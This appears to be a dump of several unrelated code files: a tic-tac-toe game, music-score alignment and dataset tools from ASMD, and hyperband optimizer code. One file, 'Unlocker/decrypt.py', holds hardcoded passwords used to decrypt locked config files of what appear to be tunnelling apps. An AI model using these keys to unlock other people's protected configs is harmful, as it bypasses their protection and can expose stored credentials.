if s[13] == s[9] == s[5] :
if s[13] == 'X':
winner = 2
elif s[13] == '0':
winner = 1
if s[1] == s[9] == s[17] :
if s[1] == 'X':
winner = 2
elif s[1] == '0':
winner = 1
if s[1] == s[13] == s[7] :
if s[1] == 'X':
winner = 2
elif s[1] == '0':
winner = 1
if s[3] == s[9] == s[15] :
if s[3] == 'X':
winner = 2
elif s[3] == '0':
winner = 1
if s[11] == s[5] == s[17] :
if s[11] == 'X':
winner = 2
elif s[11] == '0':
winner = 1
ans=['y']
if ' ' not in [s[1], s[3], s[5], s[7], s[9], s[11], s[13], s[15], s[17]]:
ans = ['n']
return ans
if __name__=='__main__':
ans=['y']
os.system('clear')
printboard(0)
while ans==['y']:
n=input('Choose your next position (1-9) player {} :'.format((c%2)+1))
os.system('clear')
ans=printboard(n)
if winner != -1:
break
c+=1
if winner != -1:
print('WINNER IS PLAYER:'+str(winner))
else:
print('DRAW!!!')
``` |
{
"source": "00sanoj00/Unlocker",
"score": 2
} |
#### File: 00sanoj00/Unlocker/decrypt.py
```python
from sys import stdin, stdout, stderr
from argparse import ArgumentParser
from pathlib import Path
from base64 import b64decode
from Crypto.Protocol.KDF import PBKDF2
from Crypto.Cipher import AES
from Crypto.Hash import SHA256
from Crypto.Util.Padding import unpad
DEFAULT_FILE_EXTENSION = '.tmt'
# passwords to derive the key from
PASSWORDS = {
'.tut': b'<PASSWORD>',
'.sks': b'<PASSWORD>!!',
'.cyh': b'dyv35182!',
'.sex': b'dYv35224nossas!.',
'.tmt': b'<PASSWORD>',
}
# some utility functions
def error(error_msg = 'Corrupted/unsupported file.'):
stderr.write(f'\033[41m\033[30m X \033[0m {error_msg}\n')
stderr.flush()
exit(1)
def warn(warn_msg):
stderr.write(f'\033[43m\033[30m ! \033[0m {warn_msg}\n')
stderr.flush()
def ask(prompt):
stderr.write(f'\033[104m\033[30m ? \033[0m {prompt} ')
stderr.flush()
return input()
def human_bool_to_bool(human_bool):
return 'y' in human_bool
def main():
# parse arguments
parser = ArgumentParser()
parser.add_argument('file', help='file to decrypt')
output_args = parser.add_mutually_exclusive_group()
output_args.add_argument('--output', '-o', help='file to output to')
output_args.add_argument('--stdout', '-O', action='store_true', help='output to stdout', default=True)
args = parser.parse_args()
# open file
encrypted_contents = open(args.file, 'r').read()
# determine the file's extension
file_ext = Path(args.file).suffix
if file_ext not in PASSWORDS:
warn(f'Unknown file extension, defaulting to {DEFAULT_FILE_EXTENSION}')
file_ext = DEFAULT_FILE_EXTENSION
# split the file
split_base64_contents = encrypted_contents.split('.')
if len(split_base64_contents) != 3:
raise ValueError('Unsupported file.')
split_contents = list(map(b64decode, split_base64_contents))
# derive the key
decryption_key = PBKDF2(PASSWORDS[file_ext], split_contents[0], hmac_hash_module=SHA256)
# decrypt the file
cipher = AES.new(decryption_key, AES.MODE_GCM, nonce=split_contents[1])
decrypted_contents = cipher.decrypt_and_verify(split_contents[2][:-16], split_contents[2][-16:])
# decide where to write contents
if args.output:
output_file_path = Path(args.output)
# check if the file exists
if output_file_path.exists() and output_file_path.is_file():
# check if the user agrees to overwrite it
if not human_bool_to_bool(ask(f'A file named "{args.output}" already exists. Overwrite it? (y/n)')):
# if user doesn't, quit
exit(0)
# write the contents to the file
output_file = open(output_file_path, 'wb')
output_file.write(decrypted_contents)
elif args.stdout:
# convert the config to UTF-8
config = decrypted_contents.decode('utf-8')
# write it to stdout
stdout.write(config)
stdout.flush()
if __name__ == '__main__':
try:
main()
except Exception as err:
error(err)
``` |
{
"source": "00sapo/ASMD",
"score": 2
} |
#### File: ASMD/asmd/alignment_stats.py
```python
import os
import os.path
import pickle
import random
from copy import deepcopy
from random import choices, uniform
from typing import List, Tuple
import numpy as np
from hmmlearn.hmm import GMMHMM
from sklearn.preprocessing import StandardScaler, minmax_scale
from .asmd import Dataset
from .conversion_tool import fix_offsets
from .dataset_utils import choice, filter, get_score_mat, union
from .eita.alignment_eita import get_matching_notes
from .idiot import THISDIR
from .utils import mat_stretch
NJOBS = -1
FILE_STATS = os.path.join(THISDIR, "_alignment_stats.pkl")
# TODO: refactoring: most of the stuffs are repeated twice for onsets and durations
class Stats(object):
def __init__(self,
ons_dev_max=0.2,
dur_dev_max=0.2,
mean_max_ons=None,
mean_max_dur=None):
self.dur_ratios = []
self.ons_diffs = []
self.ons_lengths = []
self.dur_lengths = []
self.means_ons = []
self.means_dur = []
self.ons_dev = []
self.dur_dev = []
self.ons_dev_max = ons_dev_max
self.dur_dev_max = dur_dev_max
self.mean_max_ons = mean_max_ons
self.mean_max_dur = mean_max_dur
self._song_duration_dev = 1
self._song_onset_dev = 1
self._song_mean_ons = 0
self._song_mean_dur = 0
self._seed = 1992
def seed(self):
"""
Calls `seed` on python `random` and then increments its own seed of one
"""
random.seed(self._seed)
self._seed += 1
return self._seed
def add_data_to_histograms(self, ons_diffs, dur_ratios):
"""
Method to add data, then you should still compute histograms
"""
self.ons_dev.append(np.std(ons_diffs))
self.dur_dev.append(np.std(dur_ratios))
self.means_ons.append(np.mean(ons_diffs))
self.means_dur.append(np.mean(dur_ratios))
self.ons_diffs += StandardScaler().fit_transform(
ons_diffs.reshape(-1, 1)).tolist()
self.dur_ratios += StandardScaler().fit_transform(
dur_ratios.reshape(-1, 1)).tolist()
self.ons_lengths.append(len(ons_diffs))
self.dur_lengths.append(len(dur_ratios))
def get_random_onset_dev(self, k=1):
self.seed()
return _get_random_value_from_hist(self.ons_dev_hist,
k,
max_value=self.ons_dev_max)
def get_random_duration_dev(self, k=1):
self.seed()
return _get_random_value_from_hist(self.dur_dev_hist,
k,
max_value=self.dur_dev_max)
def get_random_mean_ons(self, k=1):
self.seed()
return _get_random_value_from_hist(self.means_hist_ons,
k,
max_value=self.mean_max_ons)
def get_random_mean_dur(self, k=1):
self.seed()
return _get_random_value_from_hist(self.means_hist_dur,
k,
max_value=self.mean_max_dur)
def new_song(self):
"""
Prepare this object for a new song
"""
self.seed()
self._song_duration_dev = self.get_random_duration_dev()
self.seed()
self._song_onset_dev = self.get_random_onset_dev()
self.seed()
self._song_mean_ons = self.get_random_mean_ons()
self._song_mean_dur = self.get_random_mean_dur()
def fill_stats(self, dataset: Dataset):
"""
Fills this object with data from `datasets`
"""
global process_
def process_(i, dataset):
try:
score, aligned = get_matching_scores(dataset, i)
except RuntimeError:
# skipping if we cannot match the notes for this score
return None
# computing diffs
ons_diffs = score[:, 1] - aligned[:, 1]
dur_ratios = (aligned[:, 2] - aligned[:, 1]) / (score[:, 2] -
score[:, 1])
return ons_diffs, dur_ratios
# puts in `self._data` onset and duration diffs
self._data = dataset.parallel(
process_, # type: ignore
n_jobs=NJOBS,
backend="multiprocessing")
count = 0
for res in self._data:
if res is not None:
count += 1
ons_diffs, dur_ratios = res
self.add_data_to_histograms(ons_diffs, dur_ratios)
print(
f"Using {count / len(self._data):.2f} songs ({count} / {len(self._data)})"
)
def get_random_durations(self, aligned_dur):
aligned_dur = np.asarray(aligned_dur)
self.seed()
new_dur_ratio = self.get_random_duration_ratio(
k=len(aligned_dur)) * self._song_duration_dev + self._song_mean_dur
return aligned_dur / np.abs(new_dur_ratio)
def get_random_onsets(self, aligned):
aligned = np.asarray(aligned)
self.seed()
new_ons_diff = self.get_random_onset_diff(
k=len(aligned)) * self._song_onset_dev + self._song_mean_ons
new_ons = np.sort(aligned + new_ons_diff)
new_ons -= new_ons.min()
return new_ons
def get_random_offsets(self, aligned_ons, aligned_offs, new_ons):
aligned_ons = np.asarray(aligned_ons)
aligned_offs = np.asarray(aligned_offs)
new_ons = np.asarray(new_ons)
new_dur = self.get_random_durations(aligned_offs - aligned_ons)
return new_ons + new_dur
def get_random_onset_diff(self, k=1):
pass
def get_random_duration_ratio(self, k=1):
pass
def train_on_filled_stats(self):
"""
Compute all the histograms in tuples (histogram, bin_edges):
self.means_hist
self.ons_dev_hist
self.dur_dev_hist
"""
self.means_hist_ons = np.histogram(self.means_ons,
bins='auto',
density=True)
self.means_hist_dur = np.histogram(self.means_dur,
bins='auto',
density=True)
self.ons_dev_hist = np.histogram(self.ons_dev,
bins='auto',
density=True)
self.dur_dev_hist = np.histogram(self.dur_dev,
bins='auto',
density=True)
class HistStats(Stats):
def __init__(self, ons_max=None, dur_max=None, stats: Stats = None):
super().__init__()
if stats:
self.__dict__.update(deepcopy(stats.__dict__))
self.ons_max = ons_max
self.dur_max = dur_max
def train_on_filled_stats(self):
super().train_on_filled_stats()
# computing onset and duration histograms
self.ons_hist = np.histogram(self.ons_diffs, bins='auto', density=True)
self.dur_hist = np.histogram(self.dur_ratios,
bins='auto',
density=True)
def get_random_onset_diff(self, k=1):
self.seed()
return _get_random_value_from_hist(self.ons_hist,
k,
max_value=self.ons_max)
def get_random_duration_ratio(self, k=1):
self.seed()
return _get_random_value_from_hist(self.dur_hist,
k,
max_value=self.dur_max)
def __repr__(self):
return str(type(self))
class HMMStats(Stats):
def __init__(self, stats: Stats = None):
super().__init__()
if stats:
self.__dict__.update(deepcopy(stats.__dict__))
n_iter = 100 # maximum number of iterations
tol = 0.1 # minimum value of log-likelyhood
covariance_type = 'diag'
self.onshmm = GMMHMM(
n_components=20, # the number of gaussian mixtures
n_mix=30, # the number of hidden states
covariance_type=covariance_type,
n_iter=n_iter,
tol=tol,
verbose=True,
random_state=self.seed())
self.durhmm = GMMHMM(
n_components=2,
n_mix=3,
covariance_type=covariance_type,
n_iter=n_iter,
tol=tol,
verbose=True,
random_state=self.seed())
def get_random_onset_diff(self, k=1):
x, _state_seq = self.onshmm.sample(k, random_state=self.seed())
return x[:, 0]
def get_random_duration_ratio(self, k=1):
x, _state_seq = self.durhmm.sample(k, random_state=self.seed())
return x[:, 0]
def train_on_filled_stats(self):
super().train_on_filled_stats()
# train the hmms
def train(hmm, data, lengths):
hmm.fit(data, lengths)
if (hmm.monitor_.converged):
print("hmm converged!")
else:
print("hmm did not converge!")
print("Training duration hmm...")
train(self.durhmm, self.dur_ratios, self.dur_lengths)
print("Training onset hmm...")
train(self.onshmm, self.ons_diffs, self.ons_lengths)
def __repr__(self):
return str(type(self))
def get_matching_scores(dataset: Dataset,
i: int) -> Tuple[np.ndarray, np.ndarray]:
"""
Get a sub-scores of matching notes between `score` and the mos precisely
aligned data available for song at index `i`
Returns aligned, score
"""
mat_aligned = get_score_mat(
dataset, i, score_type=['precise_alignment', 'broad_alignment'])
mat_score = get_score_mat(dataset, i, score_type=['score'])
# stretch to the same average BPM
mat_stretch(mat_score, mat_aligned)
# changing float pitches to nearest pitch
mat_aligned[:, 0] = np.round(mat_aligned[:, 0])
mat_score[:, 0] = np.round(mat_score[:, 0])
# apply Eita method
matching_notes = get_matching_notes(mat_score, mat_aligned, timeout=20)
if matching_notes is None:
raise RuntimeError("Cannot match notes for this score!")
return mat_score[matching_notes[:, 0]], mat_aligned[matching_notes[:, 1]]
def _get_random_value_from_hist(hist, k=1, max_value=None, hmm=False):
"""
Given a histogram (tuple returned by np.histogram), returns a random value
picked with uniform distribution from a bin of the histogram. The bin is
picked following the histogram distribution. If `max` is specified, the
histogram is first normalized so that the maximum absolute value is the one
specified.
"""
if max_value:
values = minmax_scale(hist[1], (-abs(max_value), abs(max_value)))
else:
values = hist[1]
start = choices(values[:-1], weights=hist[0], k=k)
bin_w = abs(values[1] - values[0])
end = np.array(start) + bin_w
return np.asarray([uniform(start[i], end[i]) for i in range(len(start))])
def evaluate(dataset: Dataset, stats: List[Stats]):
"""
Computes classical DTW over all datasets and returns avarage and standard
deviation of all the DTW distances for each `Stats` object in stats
This function will also need to install the dtw-python module separately
"""
global process_
def process_(i: int, dataset: Dataset, stat: Stats):
# reset the stats for a new song
stat.new_song()
try:
# take the matching notes in the score
score, aligned = get_matching_scores(dataset, i)
except RuntimeError:
# skipping if cannot match notes
return -1, -1
# take random standardized differences
aligned_diff = stat.get_random_onset_diff(k=score.shape[0])
song_ons_diff = score[:, 1] - aligned[:, 1]
# computing meang and dev from the matching notes
mean = np.mean(song_ons_diff)
std = np.std(song_ons_diff)
# computing the estimated ons
ons = np.sort(aligned[:, 1] + aligned_diff * std + mean)
# computing estmated offs
dur_ratios = stat.get_random_duration_ratio(k=score.shape[0])
song_dur = (aligned[:, 2] - aligned[:, 1])
song_dur_ratio = song_dur / (score[:, 2] - score[:, 1])
# computing meang and dev from the matching notes
mean = np.mean(song_dur_ratio)
std = np.std(song_dur_ratio)
# computing the estimated offs
est_ratios = dur_ratios * std + mean
new_dur = song_dur / est_ratios
offs = ons + new_dur
fix_offsets(ons, offs, score[:, 0])
# DTW between score and affinely transformed new times
offs_dist = np.abs(offs - score[:, 2]).mean()
ons_dist = np.abs(ons - score[:, 1]).mean()
return ons_dist, offs_dist
for stat in stats:
print(f"Evaluating {stat}")
distances = dataset.parallel(
process_, # type: ignore
stat,
n_jobs=NJOBS,
max_nbytes=None,
backend="multiprocessing")
# removing scores where we couldn't match notes
distances = np.asarray(distances)
valid_scores = np.count_nonzero(distances[:, 0] > 0)
print(
f"Used {valid_scores / len(dataset)} scores ({valid_scores} / {len(dataset)})"
)
distances = distances[distances[:, 0] >= 0]
print(f"Statics for {stat} and Onsets")
print(f"Avg: {np.mean(distances[:, 0]):.2e}")
print(f"Std {np.std(distances[:, 0]):.2e}")
print(f"Statics for {stat} and Offsets")
print(f"Avg: {np.mean(distances[:, 1]):.2e}")
print(f"Std {np.std(distances[:, 1]):.2e}")
def get_stats(method='histogram', save=True, train=True):
"""
Computes statistics, histogram, dumps the object to file and returns it
"""
if os.path.exists(FILE_STATS):
return pickle.load(open(os.path.join(FILE_STATS), "rb"))
elif train:
dataset = _get_dataset()
print("Computing statistics")
stats = Stats()
stats.fill_stats(dataset)
return _train_model(stats, method, save)
else:
return None
def _get_dataset():
dataset = Dataset()
# dataset = filter(dataset,
# datasets=['Bach10', 'traditional_flute', 'MusicNet'],
# copy=True)
dataset = union(
filter(dataset,
datasets=[
'vienna_corpus', 'Bach10', 'traditional_flute', 'MusicNet'
],
copy=True),
filter(dataset, datasets=['Maestro'], groups=['asap'], copy=True))
return dataset
def _train_model(stats: Stats, method: str, save: bool):
if method == 'histogram':
stats = HistStats(stats=stats)
elif method == 'hmm':
stats = HMMStats(stats=stats)
stats.train_on_filled_stats()
if save:
print("Saving statistical model")
if os.path.exists(FILE_STATS):
os.remove(FILE_STATS)
pickle.dump(stats, open(FILE_STATS, 'wb'))
return stats
if __name__ == '__main__':
dataset = _get_dataset()
print("Computing statistics")
stats = Stats()
trainset, testset = choice(dataset,
p=[0.7, 0.3],
random_state=stats.seed())
stats.fill_stats(trainset)
for method in ['hmm', 'histogram']:
model = _train_model(stats, method, False)
# stat = pickle.load(
# open(os.path.join(THISDIR, "_alignment_stats.pkl"), "rb"))
evaluate(testset, [
model,
])
```
#### File: ASMD/asmd/asap.py
```python
import argparse
import csv
import json
import tempfile
import zipfile
from pathlib import Path
from typing import List, Mapping, Set, Tuple
from urllib.request import urlretrieve, urlcleanup
from alive_progress import alive_bar
import shutil
from .asmd import Dataset
from .dataset_utils import filter
from .idiot import THISDIR
ASAP_URL = "https://github.com/fosfrancesco/asap-dataset/archive/v1.1.zip"
def modify_maestro_definifion(index: List[Tuple[Path, Path]]) -> Mapping:
"""
This function was run only once to add the proper group `asap` to the
`Maestro` dataset
"""
# create a daset for loading the Maestro definition
dataset = Dataset()
for definition in dataset.datasets:
if definition['name'] == 'Maestro':
break
# convert index to Set of string for faster search (the `in` operation)
_index: List[str] = [str(e[0]) for e in index]
install_dir = Path(dataset.install_dir)
# add `asap` to each song with ground_truth in the index
for song in definition['songs']:
path = str((install_dir / song['recording']['path'][0]).with_suffix(''))
if path in _index:
song['groups'].append("asap")
del song['included']
del definition['included']
return definition
def download_asap() -> tempfile.TemporaryDirectory:
"""
Download ASAP from github. return the Path to the downloaded dir
"""
# downloading
print("Downloading ASAP")
asap_dir = tempfile.TemporaryDirectory()
with alive_bar(unknown='notes2', spinner='notes_scrolling') as bar:
temp_fn, _header = urlretrieve(ASAP_URL,
reporthook=lambda x, y, z: bar)
print("Uncompressing ASAP")
with zipfile.ZipFile(temp_fn, 'r') as zip_ref:
zip_ref.extractall(str(asap_dir))
urlcleanup()
return asap_dir
def make_index(asap_path: Path) -> List[Tuple[Path, Path]]:
"""
Generate a list of tuples with values:
Maestro midi paths, ASAP midi score path
"""
# a random path inside asmd
dataset = Dataset()
asmd_maestro_random_path = filter(dataset,
datasets=['Maestro']).get_gts_paths(0)[0]
# the second occurrence of `/` in the random path
_idx = asmd_maestro_random_path.index('/',
asmd_maestro_random_path.index('/') + 1)
# construct path to asmd Maestro
asmd_maestro = Path(dataset.install_dir) / asmd_maestro_random_path[:_idx]
out: List[Tuple[Path, Path]] = []
# this glob allows to abstracting over directory structure and names
for fname in asap_path.glob('**/metadata.csv'):
with open(fname) as f:
for row in csv.DictReader(f):
maestro_path = row['maestro_midi_performance']
if maestro_path:
out.append(
(Path(maestro_path.replace('{maestro}',
str(asmd_maestro))).with_suffix(''),
fname.parent / row['midi_score']))
return out
def copy_scores(index: List[Tuple[Path, Path]]):
"""
Moves the scores in `index` to the Maestro path using `.score.mid`
extension
"""
# moving files
for maestro, asap in index:
shutil.copy(asap, maestro.with_suffix('.score.mid'))
if __name__ == '__main__':
argparser = argparse.ArgumentParser()
argparser.add_argument("-m", "--modify", action='store_true')
args = argparser.parse_args()
asap_dir = download_asap()
try:
index = make_index(Path(str(asap_dir)))
if args.modify:
new_def = modify_maestro_definifion(index)
json.dump(new_def,
open(Path(THISDIR) / 'definitions' / 'Maestro.json', 'wt'), indent=4)
else:
copy_scores(index)
finally:
shutil.rmtree(Path(str(asap_dir)).parent.parent)
```
#### File: ASMD/asmd/convert_from_file.py
```python
import csv
import os
import re
from copy import deepcopy
from functools import wraps
import numpy as np
import pretty_midi
import scipy.io
from . import utils
def convert(exts, no_dot=True, remove_player=False):
"""
This function is designed to be used as decorators for functions which
converts from a filetype to our JSON format.
Example of usage:
>>> @convert(['.myext'], no_dot=True, remove_player=False)
... def function_which_converts(...):
... pass
Parameters
---
* ext : list of str
the possible extensions of the ground-truths to be converted, e.g.
['.mid', '.midi']. You can also use this parameter to remove exceeding
parts at the end of the filename (see `from_bach10_mat` and
`from_bach10_f0` source code)
* no_dot : boolean
if True, don't add a dot before of the extension, if False, add it
if not present; this is useful if you are using the extension to remove
other parts in the file name (see `ext`).
* remove_player : boolean
if True, remove the name of the player in the last part of the file
name: use this for the `traditional_flute` dataset; it will remove the
part after the last '_'.
"""
def _convert(user_convert):
@wraps(user_convert)
def func(input_fn, *args, **kwargs):
for ext in exts:
new_fn = change_ext(input_fn, ext, no_dot, remove_player)
if os.path.exists(new_fn):
break
out = user_convert(new_fn, *args, **kwargs)
if type(out) is dict:
out = [out]
return out
return func
return _convert
prototype_gt = {
"precise_alignment": {
"onsets": [],
"offsets": [],
"pitches": [],
"notes": [],
"velocities": []
},
"misaligned": {
"onsets": [],
"offsets": [],
"pitches": [],
"notes": [],
"velocities": []
},
"score": {
"onsets": [],
"offsets": [],
"pitches": [],
"notes": [],
"velocities": [],
"beats": []
},
"broad_alignment": {
"onsets": [],
"offsets": [],
"pitches": [],
"notes": [],
"velocities": []
},
"missing": [],
"extra": [],
"f0": [],
"soft": {
"values": [],
"times": []
},
"sostenuto": {
"values": [],
"times": []
},
"sustain": {
"values": [],
"times": []
},
"instrument": 255,
}
"""
The dictionary prototype for containing the ground_truth.
use:
>>> from copy import deepcopy
... from convert_from_file import prototype_gt
... prototype_gt = deepcopy(prototype_gt)
>>> prototype_gt
{
"precise_alignment": {
"onsets": [],
"offsets": [],
"pitches": [],
"notes": [],
"velocities": []
},
"misaligned": {
"onsets": [],
"offsets": [],
"pitches": [],
"notes": [],
"velocities": []
},
"score": {
"onsets": [],
"offsets": [],
"pitches": [],
"notes": [],
"velocities": [],
"beats": []
},
"broad_alignment": {
"onsets": [],
"offsets": [],
"pitches": [],
"notes": [],
"velocities": []
},
"f0": [],
"soft": {
"values": [],
"times": []
},
"sostenuto": {
"values": [],
"times": []
},
"sustain": {
"values": [],
"times": []
},
"instrument": 255,
}
Note: ``pitches``, ``velocities``, ``sustain``, ``sostenuto``, ``soft``, and
(if available) ``instrument`` must be in range [0, 128)
"""
def change_ext(input_fn, new_ext, no_dot=False, remove_player=False):
"""
Return the input path `input_fn` with `new_ext` as extension and the part
after the last '-' removed.
If `no_dot` is True, it will not add a dot before of the extension,
otherwise it will add it if not present.
`remove_player` can be used to remove the name of the player in the last
part of the file name when: use this for the `traditional_flute` dataset;
it will remove the last part after '_'.
"""
root = input_fn[:input_fn.rfind('-')]
if remove_player:
root = root[:root.rfind('_')]
if not new_ext.startswith('.'):
if not no_dot:
new_ext = '.' + new_ext
return root + new_ext
def _sort_lists(*lists):
"""
Sort multiple lists in-place with reference to the first one
"""
idx = list(range(len(lists[0])))
idx.sort(key=lists[0].__getitem__)
for i in range(len(lists)):
if len(lists[i]) > 0:
lists[i][:] = map(lists[i].__getitem__, idx)
def _sort_alignment(alignment, data):
"""
Sort `data` in `alignment` (in-place)
"""
_sort_lists(data[alignment]['onsets'], data[alignment]['pitches'],
data[alignment]['offsets'], data[alignment]['velocities'],
data[alignment]['notes'])
def _sort_pedal(data):
"""
Sort pedal for `data` (in-place)
"""
for cc_name in ['soft', 'sustain', 'sostenuto']:
_sort_lists(data[cc_name]['times'], data[cc_name]['values'])
def from_midi(midi_fn,
alignment='precise_alignment',
pitches=True,
velocities=True,
merge=True,
beats=False):
"""
Open a midi file `midi_fn` and convert it to our ground_truth
representation. This fills velocities, pitches, beats, sustain, soft,
sostenuto and alignment (default: `precise_alignment`). Returns a list
containing a dictionary. `alignment` can also be `None` or `False`, in that
case no alignment is filled. If `merge` is True, the returned list will
contain a dictionary for each track. Beats are filled according to tempo
changes.
This functions is decorated with 3 different sets of parameters:
* `from_midi` is the decorated version with `remove_player=False`
* `from_midi_remove_player` is the decorated version with
`remove_player=True`
* `from_midi_asap` is the decorated version which accept extension
'.score.mid' which is used in the script to import scores from ASAP
N.B. To allow having some annotation for subgroups of a dataset, this
function returns None when it cannot find the specified midi file; in this
way, that file is not taken into account while merging the various
annotations (e.g. asap group inside Maestro dataset)
"""
try:
pm = pretty_midi.PrettyMIDI(midi_fn)
except FileNotFoundError:
return None
out = list()
if merge:
data = deepcopy(prototype_gt)
for track in pm.instruments:
if not merge:
data = deepcopy(prototype_gt)
for cc in track.control_changes:
if cc.number == 64:
cc_name = 'sustain'
elif cc.number == 66:
cc_name = 'sostenuto'
elif cc.number == 67:
cc_name = 'soft'
else:
continue
data[cc_name]['values'].append(cc.value)
data[cc_name]['times'].append(cc.time)
for note in track.notes:
if pitches:
data[alignment]["pitches"].append(note.pitch)
if velocities:
data[alignment]["velocities"].append(note.velocity)
if alignment:
data[alignment]["onsets"].append(float(note.start))
data[alignment]["offsets"].append(float(note.end))
if beats and alignment == 'score':
data[alignment]["beats"] = sorted(pm.get_beats().tolist())
if not merge:
_sort_pedal(data)
_sort_alignment(alignment, data)
out.append(data)
if merge:
_sort_pedal(data)
_sort_alignment(alignment, data)
out.append(data)
return out
from_midi_remove_player = convert(['.mid', '.midi'],
remove_player=True)(from_midi)
from_midi_asap = convert(['.score.mid'], remove_player=False)(from_midi)
# N.B. this one must be the last one, otherwise the previous modify the already decorated function!
from_midi = convert(['.mid', '.midi'], remove_player=False)(from_midi)
@convert(['.txt'])
def from_phenicx_txt(txt_fn):
"""
Open a txt file `txt_fn` in the PHENICX format and convert it to our
ground_truth representation. This fills: `broad_alignment`.
"""
out_list = list()
with open(txt_fn) as f:
lines = f.readlines()
out = deepcopy(prototype_gt)
for line in lines:
fields = re.split(',|\n', line)
out["broad_alignment"]["notes"].append(fields[2])
out["broad_alignment"]["pitches"].append(
pretty_midi.note_name_to_number(fields[2]))
out["broad_alignment"]["onsets"].append(float(fields[0]))
out["broad_alignment"]["offsets"].append(float(fields[1]))
_sort_alignment("broad_alignment", out)
out_list.append(out)
return out_list
@convert(['-GTNotes.mat'], no_dot=True)
def from_bach10_mat(mat_fn, sources=range(4)):
"""
Open a txt file `txt_fn` in the MIREX format (Bach10) and convert it to
our ground_truth representation. This fills: `precise_alignment`, `pitches`.
`sources` is an iterable containing the indices of the sources to be
considered, where the first source is 0. Returns a list of dictionary, one
per source.
"""
out_list = list()
mat = scipy.io.loadmat(mat_fn)['GTNotes']
for i in range(len(mat)):
out = deepcopy(prototype_gt)
source = mat[i, 0]
for j in range(len(source)):
note = source[j, 0]
out["precise_alignment"]["pitches"].append(
np.median(np.rint(note[1, :])))
out["precise_alignment"]["onsets"].append(
(note[0, 0] - 2) * 10 / 1000.)
out["precise_alignment"]["offsets"].append(
(note[0, -1] - 2) * 10 / 1000.)
_sort_alignment("precise_alignment", out)
out_list.append(out)
return out_list
@convert(['-GTF0s.mat'], no_dot=True)
def from_bach10_f0(nmat_fn, sources=range(4)):
"""
Open a matlab mat file `nmat_fn` in the MIREX format (Bach10) for frame
evaluation and convert it to our ground_truth representation. This fills:
`f0`. `sources` is an iterable containing the indices of the sources to
be considered, where the first source is 0. Returns a list of dictionary,
one per source.
"""
out_list = list()
f0s = scipy.io.loadmat(nmat_fn)['GTF0s']
for source in sources:
out = deepcopy(prototype_gt)
out["f0"] = f0s[source].tolist()
out_list.append(out)
return out_list
@convert(['.csv'])
def from_musicnet_csv(csv_fn, sr=44100.0):
"""
Open a csv file `csv_fn` and convert it to our ground_truth representation.
This fills: `broad_alignment`, `score`, `pitches`.
This returns a list containing only one dict. `sr` is the samplerate of the
audio files (MusicNet csv contains the sample number as onset and offsets of
each note) and it shold be a float.
N.B. MusicNet contains wav files at 44100 Hz as samplerate.
N.B. Lowest in pitch in musicnet is 21, so we assume that they count pitch
starting with 0 as in midi.org standard.
N.B. `score` times are provided with BPM 60 for all the scores
"""
data = csv.reader(open(csv_fn), delimiter=',')
out = deepcopy(prototype_gt)
# skipping first line
next(data)
for row in data:
# converting everything to float, except the last onw that is the
# duration name as string
row = list(map(float, row[:-1]))
out["broad_alignment"]["onsets"].append(int(row[0]) / sr)
out["broad_alignment"]["offsets"].append(int(row[1]) / sr)
out["instrument"] = int(row[2])
out["broad_alignment"]["pitches"].append(int(row[3]))
out["score"]["pitches"].append(int(row[3]))
out["score"]["onsets"].append(float(row[4]))
out["score"]["offsets"].append(float(row[4]) + float(row[5]))
out["score"]["beats"] = [
i for i in range(int(max(out["score"]["offsets"])) + 1)
]
_sort_alignment('score', out)
_sort_alignment('broad_alignment', out)
return out
@convert(['.gt'])
def from_sonic_visualizer(gt_fn, alignment='precise_alignment'):
"""
Takes a filename of a sonic visualizer output file exported as 'csv' and
fills the 'alignment' specified
"""
min_midi_freq = utils.midi_pitch_to_f0(0)
data = csv.reader(open(gt_fn), delimiter=',')
out = deepcopy(prototype_gt)
for row in data:
p = float(row[1])
if p < min_midi_freq:
continue
out[alignment]["onsets"].append(float(row[0]))
out[alignment]["offsets"].append(float(row[0]) + float(row[2]))
pitch = utils.f0_to_midi_pitch(p)
out[alignment]["pitches"].append(pitch)
_sort_alignment(alignment, out)
return out
``` |
{
"source": "00sapo/hypermax",
"score": 2
} |
#### File: hypermax/algorithms/adaptive_bayesian_hyperband_optimizer.py
```python
import numpy as np
import random
from math import log, ceil
from time import time, ctime
from .optimization_algorithm_base import OptimizationAlgorithmBase
from .random_search_optimizer import RandomSearchOptimizer
from pprint import pprint
from ..hyperparameter import Hyperparameter
import hyperopt
import json
import functools
import copy
class AdaptiveBayesianHyperband(OptimizationAlgorithmBase):
""" This algorithm combines our ATPE optimizer with Hyperband"""
def __init__(self, baseOptimizer, min_budget, max_budget, eta = 3):
self.baseOptimizer = baseOptimizer
self.randomOptimizer = RandomSearchOptimizer()
self.min_budget = min_budget
self.max_budget = max_budget # maximum iterations per configuration
self.eta = eta # defines configuration downsampling rate (default = 3)
self.logeta = lambda x: log(x) / log(self.eta)
self.s_max = int(self.logeta(self.max_budget))
self.B = (self.s_max + 1) * self.max_budget
self.results = [] # list of dicts
@classmethod
def configurationSchema(self):
return {}
def createBudgetSchedule(self):
runs = []
for s in reversed( range( self.s_max + 1 )):
# initial number of configurations
n = self.B / self.max_budget / (s + 1) * self.eta ** s
# initial amount of budget per config
r = self.max_budget * self.eta ** (-s)
runs_in_sequence = 0
if round(r) >= self.min_budget:
for i in range(( s + 1 )):
# Run each of the n configs for <iterations>
# and keep best (n_configs / eta) configurations
n_configs = n * self.eta ** ( -i )
n_budget = r * self.eta ** ( i )
runs.append({
"group": s,
"round": runs_in_sequence,
"configs_start": int(round(n_configs)),
"configs_finish": int(round(n_configs / self.eta)),
"input_configs": int(round(n_configs * self.eta)),
"input_round": runs_in_sequence - 1,
"input_budget": -1 if i == 0 else int(ceil(r * self.eta ** ( i - 1 ))),
"budget": int(round(n_budget))
})
runs_in_sequence += 1
return runs
# return self.results
def createCanonicalStringFromResult(self, result, hyperparameterSpace):
params = Hyperparameter(hyperparameterSpace).convertToStructuredValues(result)
keys = list(params.keys())
for key in keys:
if key in OptimizationAlgorithmBase.resultInformationKeys or key.startswith('$'):
del params[key]
return json.dumps(params, sort_keys=True)
def createCanonicalStringFromParameters(self, params, hyperparameterSpace):
newResult = Hyperparameter(hyperparameterSpace).convertToFlatValues(params)
return self.createCanonicalStringFromResult(newResult, hyperparameterSpace)
def recommendNextParameters(self, hyperparameterSpace, results, currentTrials, lockedValues=None):
runs = self.createBudgetSchedule()
space = Hyperparameter(hyperparameterSpace)
finishedAndRunningResults = [result for result in results if result['loss'] is not None] + [space.convertToFlatValues(trial['params']) for trial in currentTrials]
runsNeeded = []
loopResults = []
loop = None
# Find which is the largest $loop we find in the results
if len(finishedAndRunningResults) == 0:
loop = 0
